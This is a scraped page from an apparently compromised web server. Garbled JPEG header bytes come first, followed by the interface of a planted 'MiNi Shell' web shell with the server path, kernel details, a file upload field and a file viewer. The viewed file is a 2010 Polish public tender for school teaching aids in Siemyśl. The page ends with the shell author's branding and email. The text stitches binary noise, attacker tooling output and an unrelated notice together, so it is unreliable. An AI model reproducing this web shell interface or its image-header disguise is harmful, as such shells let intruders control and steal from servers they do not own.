JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100921/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100921/300516-N-2010.html

<p class="kh_header"><b>Siemyśl: Dostawa pomocy dydaktycznych i sprzętu szkolnego na realizację zajęć pozalekcyjnych w ramach Programu Operacyjnego Kapitał Ludzki Świat Bliżej Nas</b><br>
<b>Numer ogłoszenia: 300516 - 2010; data zamieszczenia: 21.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Noblistów Polskich , ul. Szkolna 10, 78-123 Siemyśl, woj. zachodniopomorskie, tel. 94 35 880 25, faks 94 35 880 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szkola.siemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych i sprzętu szkolnego na realizację zajęć pozalekcyjnych w ramach Programu Operacyjnego Kapitał Ludzki Świat Bliżej Nas.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do Zespołu Szkół im. Noblistów Polskich w Siemyślu pomocy dydaktycznych i sprzętu szkolnego na realizację zajęć pozalekcyjnych w ramach Programu Operacyjnego Kapitał Ludzki Świat Bliżej Nas
POMOCE DO ZAJĘĆ MATEMATYCZNYCH 1. termometry demonstracyjne - 5 szt.,
2.planszowe  gry matematyczne - 30 szt.,3. magnetyczne przybory matematyczne -  szt.6.,gry logiczne - 15 szt.,5. zegary demonstracyjne - 5 szt. ,6. liczydła drewniane -5 szt.,7. komplety -numerki i liczmany -  5 komplety,  8. koła magnetyczne (ułamki) - 6  szt.,9.tablica magnetyczna z przyborami do kreślenia- 1 szt.,10. wagi szalkowe z odważnikami  - 15 szt.,11. wagi elektroniczne - 5 szt.,12. pojemniki do badania objętości -  5 kompletów,13.  domina matematyczne -  7  szt,14.  zestawy-bryły  - 3 zestawy,15. komplety magnetycznych sześcianów -  3 komplety,16. kalkulatory  - 30 szt
POMOCE DO ZAJĘĆ   PRZYRODNICZYCH
17. gry o tematyce przyrodniczej - 10 szt.,18. bezprzewodowa stacja pogodowa - 3 szt.,19. modele układu słonecznego - 4 szt.,20. modele zaćmienia słońca i księżyca - 3 szt.,21. zestawy do eksperymentów przyrodniczych 1 szt.,22.   zestawy do eksperymentów z elektrycznością - 3 szt.,23. zestawy plansz Przyroda polska - 3 szt.,24.mikroskopy - 3 szt.,25. globusy -3 szt.,26. modele nadmuchiwanych chmur - 6 szt.,27.  model procesu stwardnienia tętnic - 1 szt
28. model serca ludzkiego - 1 szt.,29. modele stawów człowieka - 5 szt,30. model kwiatu - 3 szt.,31 model struktury liścia - 3 szt.,32. model główki tasiemca - 5 szt,
33. modele owadów - 5 szt,34. zestaw przyborów do eksperymentów- siła wody i powietrza -1 szt.,35. pudełko do eksperymentów- magnetyzm - 1 szt,36.zestaw do modelowania pół magnetycznych i efektów magnetodynamicznych -  1 szt,37.  generator van de Graaffa - 1 szt,38. zestaw szkieł laboratoryjnych - 1 zestaw,39. maszyna elektrostatyczna - 2 szt,40.   płytki  z zatopionymi opiłkami - 5 szt,41. zestawy  do testowania minerałów - 3 szt,42. magnesy sztabkowe - 10 szt.,43.model manekina dziecka - 1 szt.,44.fantom - 1 szt.
POMOCE  DO  ZAJĘĆ  CHEMICZNYCH/ BIOLOGICZNYCH
45. zestaw doświadczalny 20 -elementowy - 1szt.,46. zestaw do chemii organicznej i nieorganicznej - 1 szt.,47. foliogramy: powietrze i jego zanieczyszczenie - 1 zestaw ,48.krążki barw Newtona - 5 szt.,49. zestaw obieg wody w przyrodzie - 5 szt.,50. zestaw modeli-Cykl życiowy  organizmów - 5 szt.,51. zestaw -Zmysły - 5 szt.,52. zestaw młodego badacza przyrody -6 szt.,53. energia odnawialna wody -wiatru- Słońca - model demonstracyjny - 3 szt.,54.model DNA - 1 szt.,55.   lornetki - 10 szt.,56. model anatomiczny człowieka 1 szt,57. elektryczna pompa próżniowa z manometrem -  1 szt.,58.  plansze dydaktyczne do nauki fizyki - 3 szt.,59. plansze demonstracyjne do nauki chemii - 4 plansze
MAPY, PRZEWODNIKI, ATLASY
60.mapy państw Unii Europejskiej - 27 szt,61.mapy Polski - 3 szt.,62. stojaki na mapy i plansze - 3 szt,63. mapy - plany miast - stolic UE - 27 szt.,64.  przewodniki po krajach UE - 27 szt.,65. atlasy  geograficzne - 10 szt.
SPRZĘT
66.gablota z plaksą - 7 szt.,67.tablica korkowa -1 szt.,68.tablety interaktywne - 10 szt.,68.tablica interaktywna IQ Board 78 cali z projektorem Beng MP 772 i statywem z regulowaną wysokością - 1 szt,69. ława optyczna -1 szt.,70.lupa stojąca podświetlana - 1 szt.,71.wizualizer -1 szt,72.dyktafon - 3 szt,73.aparat fotograficzny - 1 szt.,74.projektor medialny - 1 szt.,75. ekran projekcyjny - 1 szt.
76.teleskop - 1 szt,77.multimedialne obserwatorium - 1 szt.,78. magnetyczny plan zajęć -1 szt.
PROGRAMY KOMPUTEROWE
79. program multimedialny SOKRATES 101 - 1  szt.,80.program multimedialny SOKRATES 102 - 1 szt,81.program multimedialny SOKRATES 103 - 1 szt
82.program komputerowy-Przyroda w klasach I-III - 1 szt.,83.program komputerowy-Przyroda w klasach IV-VI - 1 szt.,84.program komputerowy Taskmagic -matematyka w klasach I-III - 1 szt.,85.program komputerowy Taskmagic -matematyka w klasach IV-VI - 1 szt.,86.program komputerowy do nauki matematyki - 1 szt.,87. pakiet programów multimedialnych do biologii - 1 szt., 88. plansze matematyczne dla klas IV-VI, 89.foliogramy elementy astronomii - 4 szt.,90.foliogramy nauka anatomii człowieka - 4 szt.,91.program multimedialny do nauki chemii - 1 szt.,92. program multimedialny do nauki fizyki  -1 szt.,93.program komputerowy do obróbki zdjęć 1 szt.,94.program multimedialny-logorytmika - 1 szt,95.multimadialne pakiety gier matematycznych  - 3 szt
POMOCE  DO  ZAJĘĆ  TERAPEUTYCZNYCH
96.bajki terapeutyczne- 10 szt.,97.filmy terapeutyczne - 10 szt., 98.karty do terapii - 10 szt.,99. gry socjoterapeutyczne - 10 szt.,100. walizka logopedyczna - 1 szt.,101. gry logopedyczne - 10 szt.,102. testy ortofoniczne - 10 szt.,103. plansze od obrazka do słowa - 1 komplet,104 słowniki ortofoniczne-10szt, 105 filmy edukacyjne z przyrody - 20 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 22.11.48.00-2, 22.11.42.00-4, 30.19.59.00-1, 30.23.74.50-8, 32.33.21.00-0, 32.35.12.00-0, 37.52.41.00-8, 37.52.42.00-9, 38.51.00.00-3, 38.63.00.00-0, 38.65.10.00-3, 39.15.11.00-6, 39.16.20.00-5, 39.16.21.10-9, 39.29.86.00-3, 48.91.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielanie zamówienia mogą ubiegać sie wykonawcy, którzy  złożą oświadczenie o spełnianiu warunków okreslonych w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych. Ocena w/w warunku udziału w postępowaniu będzie dokonywana wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielanie zamówienia mogą ubiegać sie wykonawcy, którzy  złożą oświadczenie o spełnianiu warunków okreslonych w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych.Ocena w/w warunku udziału w postępowaniu będzie dokonywana wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielanie zamówienia mogą ubiegać sie wykonawcy, którzy  złożą oświadczenie o spełnianiu warunków okreslonych w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych.Ocena w/w warunku udziału w postępowaniu będzie dokonywana wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielanie zamówienia mogą ubiegać sie wykonawcy, którzy  złożą oświadczenie o spełnianiu warunków okreslonych w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych.Ocena w/w warunku udziału w postępowaniu będzie dokonywana wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielanie zamówienia mogą ubiegać sie wykonawcy, którzy  złożą oświadczenie o spełnianiu warunków okreslonych w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych.Ocena w/w warunku udziału w postępowaniu będzie dokonywana wg zasady spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szkola.siemysl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół im. Noblistów Polskich , ul. Szkolna 10, 78-123 Siemyśl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 13:00, miejsce: Zespół Szkół im. Noblistów Polskich , ul. Szkolna 10, 78-123 Siemyśl, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane ze środków Europejskiego Funduszu Społecznego zgodnie z projektem Świat Bliżej Nas w ramach Programu Operacyjnego Kapitał Ludzki Działanie 9.1, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych Priorytet IX. Nr projektu UDA-POKL.09.01.02-32-061/10-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com